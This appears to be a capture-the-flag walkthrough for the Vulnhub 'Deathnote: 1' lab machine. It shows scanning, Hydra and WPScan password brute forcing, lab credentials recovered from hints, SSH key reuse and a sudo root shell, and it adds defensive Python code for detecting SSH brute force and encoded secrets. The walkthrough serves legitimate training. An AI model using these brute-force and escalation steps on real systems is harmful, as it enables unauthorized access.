Vulnhub Deathnote Target Machine: Detailed Testing Walkthrough




Name: Deathnote: 1



└─$ sudo netdiscover -i eth1 -r
Currently scanning:   |   Screen View: Unique Hosts                                                        
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
                 0a:00:27:00:00:0a      1      60  Unknown vendor
                 08:00:27:a6:91:71      1      60  PCS Systemtechnik GmbH
                 08:00:27:6a:7a:fa      1      60  PCS Systemtechnik GmbH

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.205.


└─$ sudo nmap -sS -sV -sC -p- -oN nmap_full_scan
Starting Nmap 7.93 ( ) at 2023-01-16 08:09 EST
Nmap scan report for
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5eb8ff2dacc7e93c992f3bfcda5ca353 (RSA)
|   256 a8f3819d0adc169a49eebc24e4655ca6 (ECDSA)
|_  256 4f20c32d19755be81f320175c2709a7e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:6A:7A:FA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 16.03 seconds




└─$ sudo vim /etc/hosts                                        
└─$ cat /etc/hosts
       localhost       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters  deathnote.vuln

After refreshing the page there is a link: HINT, Find a notes.txt file on server

└─$ nikto -h http://deathnote.vuln/  
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:    deathnote.vuln
+ Target Port:        80
+ Start Time:         2023-01-16 08:44:10 (GMT-5)
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: c5, size: 5cb285991624e, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7785 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-01-16 08:44:57 (GMT-5) (47 seconds)
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to
└─$ nikto -h http://deathnote.vuln/wordpress/
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:    deathnote.vuln
+ Target Port:        80
+ Start Time:         2023-01-16 08:45:08 (GMT-5)
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://deathnote.vuln/wordpress/index.php/wp-json/>; rel=""
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /wordpress/license.txt: License file found may identify site software.
+ /wordpress/: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wordpress/wp-content/uploads/: Directory indexing found.
+ /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wordpress/wp-login.php: Wordpress login found
+ 7785 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2023-01-16 08:45:57 (GMT-5) (49 seconds)
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to
└─$ gobuster dir -u http://deathnote.vuln/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://deathnote.vuln/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
2023/01/16 08:46:25 Starting gobuster in directory enumeration mode
/wordpress            (Status: 301) [Size: 320] [--> http://deathnote.vuln/wordpress/]
/manual               (Status: 301) [Size: 317] [--> http://deathnote.vuln/manual/]
/server-status        (Status: 403) [Size: 279]
Progress: 216128 / 220561 (97.99%)===============================================================
2023/01/16 08:46:47 Finished
└─$ gobuster dir -u http://deathnote.vuln/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://deathnote.vuln/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,txt,sh,html
[+] Timeout:                 10s
2023/01/16 08:47:02 Starting gobuster in directory enumeration mode
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 197]
/.html                (Status: 403) [Size: 279]
/wordpress            (Status: 301) [Size: 320] [--> http://deathnote.vuln/wordpress/]
/manual               (Status: 301) [Size: 317] [--> http://deathnote.vuln/manual/]
/robots.txt           (Status: 200) [Size: 68]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1101050 / 1102805 (99.84%)===============================================================
2023/01/16 08:48:59 Finished
└─$ gobuster dir -u http://deathnote.vuln/wordpress/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://deathnote.vuln/wordpress/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,txt,sh,html
[+] Timeout:                 10s
2023/01/16 08:49:11 Starting gobuster in directory enumeration mode
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 301) [Size: 0] [--> http://deathnote.vuln/wordpress/]
/wp-content           (Status: 301) [Size: 331] [--> http://deathnote.vuln/wordpress/wp-content/]
/wp-login.php         (Status: 200) [Size: 6799]
/license.txt          (Status: 200) [Size: 19915]
/wp-includes          (Status: 301) [Size: 332] [--> http://deathnote.vuln/wordpress/wp-includes/]
/readme.html          (Status: 200) [Size: 7346]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 329] [--> http://deathnote.vuln/wordpress/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://deathnote.vuln/wordpress/wp-login.php?action=register]
Progress: 1100068 / 1102805 (99.75%)===============================================================
2023/01/16 08:51:15 Finished

└─$ wpscan --url http://deathnote.vuln/wordpress -e u,p                                         
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic -
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://deathnote.vuln/wordpress/ []
[+] Started: Mon Jan 16 08:52:43 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://deathnote.vuln/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  -
 |  -
 |  -
 |  -
 |  -

[+] WordPress readme found: http://deathnote.vuln/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://deathnote.vuln/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://deathnote.vuln/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  -
 |  -

[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).
 | Found By: Rss Generator (Passive Detection)
 |  - http://deathnote.vuln/wordpress/index.php/feed/, <generator></generator>
 |  - http://deathnote.vuln/wordpress/index.php/comments/feed/, <generator></generator>

[+] WordPress theme in use: twentytwentyone
 | Location: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 1.7
 | Style URL: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3
 | Style Name: Twenty Twenty-One
 | Style URI:
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI:
 | Found By: Css Style In Homepage (Passive Detection)
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] kira
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://deathnote.vuln/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at

[+] Finished: Mon Jan 16 08:52:46 2023
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 14.702 KB
[+] Data Received: 444.821 KB
[+] Memory used: 234.879 MB
[+] Elapsed time: 00:00:03
└─$ wpscan --url http://deathnote.vuln/wordpress -U kira -P /usr/share/wordlists/rockyou.txt 



└─$ curl http://deathnote.vuln/robots.txt         
fuck it my dad 
added hint on /important.jpg

ryuk please delete it
└─$ wget http://deathnote.vuln/important.jpg                              
--2023-01-16 09:13:29--  http://deathnote.vuln/important.jpg
Resolving deathnote.vuln (deathnote.vuln)...
Connecting to deathnote.vuln (deathnote.vuln)||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 277 [image/jpeg]
Saving to: ‘important.jpg’

important.jpg                   100%[====================================================>]     277  --.-KB/s    in 0s      

2023-01-16 09:13:29 (78.8 MB/s) - ‘important.jpg’ saved [277/277]

└─$ ls -alh
total 16K
drwxr-xr-x  2 kali kali 4.0K Jan 16 09:13 .
drwxr-xr-x 24 kali kali 4.0K Jan 16 08:07 ..
-rw-r--r--  1 kali kali  277 Aug 29  2021 important.jpg
-rw-r--r--  1 root root  939 Jan 16 08:09 nmap_full_scan
└─$ steghide extract -sf important.jpg 
Enter passphrase: 
└─$ stegseek important.jpg            
StegSeek 0.6 -

[!] error: the file format of the file "important.jpg" is not supported.
└─$ binwalk -e important.jpg 


└─$ ls     
important.jpg  nmap_full_scan
└─$ file important.jpg                           
important.jpg: ASCII text
└─$ cat important.jpg                    
i am Soichiro Yagami, light's father
i have a doubt if L is true about the assumption that light is kira

i can only help you by giving something important

login username : user.txt
i don't know the password.
find it by yourself 
but i think it is in the hint section of site


The password is in the Hint section, so it should be: iamjustic3





└─$ hydra -l kira -P dict ssh:// 
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2023-01-16 09:22:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 44 login tries (l:1/p:44), ~3 tries per task
[DATA] attacking ssh://
1 of 1 target completed, 0 valid password found
Hydra ( finished at 2023-01-16 09:22:39
└─$ hydra -l L -P dict ssh://
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2023-01-16 09:22:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 44 login tries (l:1/p:44), ~3 tries per task
[DATA] attacking ssh://
1 of 1 target completed, 0 valid password found
Hydra ( finished at 2023-01-16 09:22:58
└─$ hydra -l l -P dict ssh://
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2023-01-16 09:23:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 44 login tries (l:1/p:44), ~3 tries per task
[DATA] attacking ssh://
[22][ssh] host:   login: l   password: death4me
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra ( finished at 2023-01-16 09:23:12
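
From the defender's side, the three runs above show up in the target's auth log as a burst of failed password attempts from one source, followed by an accepted login. The following added example (not part of the original walkthrough) detects that pattern with a sliding window; the log lines, source addresses, threshold and window are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH password-authentication result lines as written to auth.log.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+")


def parse(lines, year=2023):
    """Yield (timestamp, result, user, source); syslog lines carry no year."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["src"]


def detect(lines, threshold=10, window=timedelta(seconds=60)):
    """Alert on sources with >= threshold failures inside the window."""
    recent = defaultdict(deque)   # source -> failure timestamps still in window
    tried = defaultdict(set)      # source -> usernames it failed against
    alerts = {}
    for ts, result, user, src in parse(lines):
        q = recent[src]
        while q and ts - q[0] > window:
            q.popleft()
        if result == "Failed":
            q.append(ts)
            tried[src].add(user)
            if len(q) >= threshold:
                alert = alerts.setdefault(src, {"peak": 0, "success": None})
                alert["peak"] = max(alert["peak"], len(q))
        elif q and src in alerts and alerts[src]["success"] is None:
            # Accepted login while the burst is still inside the window.
            alerts[src]["success"] = user
    for src, alert in alerts.items():
        alert["users_tried"] = sorted(tried[src])
    return alerts


def sample_log():
    """Constructed log lines shaped like the three runs above (addresses made up)."""
    src, lines = "192.0.2.10", []
    start = datetime(2023, 1, 16, 9, 22, 30)
    # Assumption: "L" is logged as an invalid user, "kira" and "l" as valid ones.
    runs = (("kira", 0, False), ("L", 20, True), ("l", 34, False))
    for user, offset, invalid in runs:
        who = f"invalid user {user}" if invalid else user
        for i in range(12):
            ts = start + timedelta(seconds=offset + i // 2)
            lines.append(f"{ts:%b %d %H:%M:%S} deathnote sshd[{900 + i}]: "
                         f"Failed password for {who} from {src} port {40000 + i} ssh2")
    ts = start + timedelta(seconds=41)
    lines.append(f"{ts:%b %d %H:%M:%S} deathnote sshd[990]: "
                 f"Accepted password for l from {src} port 40100 ssh2")
    # A single mistyped password from another constructed source must not alert.
    lines.append(f"{ts:%b %d %H:%M:%S} deathnote sshd[991]: "
                 f"Failed password for l from 192.0.2.77 port 50000 ssh2")
    return lines


if __name__ == "__main__":
    for src, alert in detect(sample_log()).items():
        print(src, alert)
```

An alert whose `success` field is set is the case to escalate first: the guessing stopped because a password worked.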

└─$ ssh l@                                           
The authenticity of host ' (' can't be established.
ED25519 key fingerprint is SHA256:Pj7G++7sat/zpoeFTsy5FUba1luVvaIo7NG0PdXzxY8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ED25519) to the list of known hosts.
l@'s password: 
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep  4 06:12:29 2021 from
l@deathnote:~$ id
uid=1000(l) gid=1000(l) groups=1000(l),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
l@deathnote:~$ sudo -l
[sudo] password for l: 
Sorry, user l may not run sudo on deathnote.
l@deathnote:~$ ls -alh
total 36K
drwxr-xr-x 4 l    l    4.0K Sep  4  2021 .
drwxr-xr-x 4 root root 4.0K Jul 19  2021 ..
-rw------- 1 l    l       3 Sep  4  2021 .bash_history
-rw-r--r-- 1 l    l     220 Jul 19  2021 .bash_logout
-rw-r--r-- 1 l    l    3.5K Jul 19  2021 .bashrc
drwxr-xr-x 3 l    l    4.0K Jul 19  2021 .local
-rw-r--r-- 1 l    l     807 Jul 19  2021 .profile
drwx------ 2 l    l    4.0K Sep  4  2021 .ssh
-rw-r--r-- 1 root root  512 Jul 19  2021 user.txt
l@deathnote:~$ cat user.txt


i think u got the shell , but you wont be able to kill me -kira
l@deathnote:/home/kira$ cd .ssh
l@deathnote:/home/kira/.ssh$ ls -alh
total 12K
drwxr-xr-x 2 kira kira 4.0K Jul 19  2021 .
drwxr-xr-x 4 kira kira 4.0K Sep  4  2021 ..
-rw-r--r-- 1 kira kira  393 Jul 19  2021 authorized_keys
l@deathnote:/home/kira/.ssh$ cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZNh4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAGHaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75mi6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQICFZ6z l@deathnote
l@deathnote:/home/kira/.ssh$ ssh kira@
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep  4 06:00:09 2021 from

kira@deathnote:~$ cat kira.txt 

└─$ echo 'cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp' | base64 -d
please protect one of the following 
1. L (/opt)
2. Misa (/var)
kira@deathnote:~$ cd /opt
kira@deathnote:/opt$ ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Aug 29  2021 .
drwxr-xr-x 18 root root 4.0K Jul 19  2021 ..
drwxr-xr-x  4 root root 4.0K Aug 29  2021 L
kira@deathnote:/opt$ cd L
kira@deathnote:/opt/L$ ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Aug 29  2021 .
drwxr-xr-x 3 root root 4.0K Aug 29  2021 ..
drwxr-xr-x 2 root root 4.0K Aug 29  2021 fake-notebook-rule
drwxr-xr-x 2 root root 4.0K Aug 29  2021 kira-case
kira@deathnote:/opt/L$ cd fake-notebook-rule/
kira@deathnote:/opt/L/fake-notebook-rule$ ls -alh
total 16K
drwxr-xr-x 2 root root 4.0K Aug 29  2021 .
drwxr-xr-x 4 root root 4.0K Aug 29  2021 ..
-rw-r--r-- 1 root root   84 Aug 29  2021 case.wav
-rw-r--r-- 1 root root   15 Aug 29  2021 hint
kira@deathnote:/opt/L/fake-notebook-rule$ cat hint
use cyberchef

kira@deathnote:/opt/L/fake-notebook-rule$ cat case.wav
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
kira@deathnote:/opt/L/fake-notebook-rule$ cd ..
kira@deathnote:/opt/L$ ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Aug 29  2021 .
drwxr-xr-x 3 root root 4.0K Aug 29  2021 ..
drwxr-xr-x 2 root root 4.0K Aug 29  2021 fake-notebook-rule
drwxr-xr-x 2 root root 4.0K Aug 29  2021 kira-case
kira@deathnote:/opt/L$ cd kira-case/
kira@deathnote:/opt/L/kira-case$ ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Aug 29  2021 .
drwxr-xr-x 4 root root 4.0K Aug 29  2021 ..
-rw-r--r-- 1 root root  295 Aug 29  2021 case-file.txt
kira@deathnote:/opt/L/kira-case$ cat case-file.txt 
the FBI agent died on December 27, 2006

1 week after the investigation of the task-force member/head.
Soichiro Yagami's family .

and according to watari ,
he died as other died after Kira targeted them .

and we also found something in 
fake-notebook-rule folder .

Following the hint, decoding with CyberChef gives: passwd : kiraisevil
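
The same decode (From Hex, then From Base64) can be scripted. The following is an added example, not part of the original walkthrough: it peels hex and Base64 layers from the two file contents shown above and flags plaintext that looks like a credential, the check a defender would run over world-readable files. The function names and the credential pattern are assumptions of this example.

```python
import base64
import binascii
import re

# File contents copied from the terminal output in this walkthrough.
CASE_WAV = ("63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 "
            "59 57 6c 7a 5a 58 5a 70 62 43 41 3d")
KIRA_TXT = ("cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9v"
            "cHQpCjIuIE1pc2EgKC92YXIp")

HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2}[\s:]*)+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
# Assumed pattern for "looks like a credential"; tune it for real audits.
CRED_RE = re.compile(r"\b(?:pass(?:wd|word)?|pwd|secret|token)\b\s*[:=]", re.I)


def _text(raw: bytes):
    """Return raw as str if it is printable UTF-8, else None."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def peel_once(text: str):
    """Return (encoding, decoded_text), or None when no layer is recognised."""
    s = text.strip()
    if len(s) < 8:                      # too short to classify reliably
        return None
    if HEX_RE.fullmatch(s):             # hex first: hex digits are also valid Base64
        decoded = _text(bytes.fromhex(re.sub(r"[\s:]", "", s)))
        if decoded is not None:
            return "hex", decoded
    compact = re.sub(r"\s+", "", s)
    if len(compact) % 4 == 0 and B64_RE.fullmatch(compact):
        try:
            decoded = _text(base64.b64decode(compact, validate=True))
        except binascii.Error:
            return None
        if decoded is not None:
            return "base64", decoded
    return None


def peel(text: str, max_depth: int = 5):
    """Strip nested layers; return (encodings in the order removed, final text)."""
    layers = []
    for _ in range(max_depth):
        step = peel_once(text)
        if step is None:
            break
        layers.append(step[0])
        text = step[1]
    return layers, text


def audit(name: str, content: str) -> dict:
    """Report the layers found in one file and whether the result looks secret."""
    layers, plain = peel(content)
    return {"file": name, "layers": layers, "plaintext": plain,
            "credential_like": bool(layers) and bool(CRED_RE.search(plain))}


if __name__ == "__main__":
    for name, content in (("case.wav", CASE_WAV), ("kira.txt", KIRA_TXT)):
        print(audit(name, content))
```

Only `case.wav` is flagged: encoding a password twice changes how it looks, not who can read it.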


kira@deathnote:/opt/L/kira-case$ sudo -l
[sudo] password for kira: 
Matching Defaults entries for kira on deathnote:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kira may run the following commands on deathnote:
    (ALL : ALL) ALL
kira@deathnote:/opt/L/kira-case$ sudo /bin/bash
root@deathnote:/opt/L/kira-case# cd /root
root@deathnote:~# ls -alh
total 32K
drwx------  3 root root 4.0K Sep  4  2021 .
drwxr-xr-x 18 root root 4.0K Jul 19  2021 ..
-rw-------  1 root root   35 Sep  4  2021 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Jul 19  2021 .local
-rw-------  1 root root  190 Jul 19  2021 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  957 Jul 19  2021 root.txt
root@deathnote:~# cat root.txt

      ::::::::       ::::::::       ::::    :::       ::::::::       :::::::::           :::    :::::::::::       :::::::: 
    :+:    :+:     :+:    :+:      :+:+:   :+:      :+:    :+:      :+:    :+:        :+: :+:      :+:          :+:    :+: 
   +:+            +:+    +:+      :+:+:+  +:+      +:+             +:+    +:+       +:+   +:+     +:+          +:+         
  +#+            +#+    +:+      +#+ +:+ +#+      :#:             +#++:++#:       +#++:++#++:    +#+          +#++:++#++   
 +#+            +#+    +#+      +#+  +#+#+#      +#+   +#+#      +#+    +#+      +#+     +#+    +#+                 +#+    
#+#    #+#     #+#    #+#      #+#   #+#+#      #+#    #+#      #+#    #+#      #+#     #+#    #+#          #+#    #+#     
########       ########       ###    ####       ########       ###    ###      ###     ###    ###           ########       

##########follow me on twitter###########3
and share this screen shot and tag @KDSAMF



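  1. This target machine gives hints all the way through, but accessing the /robots.txt file returned "not found"; in that case, try command-line methods such as curl.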
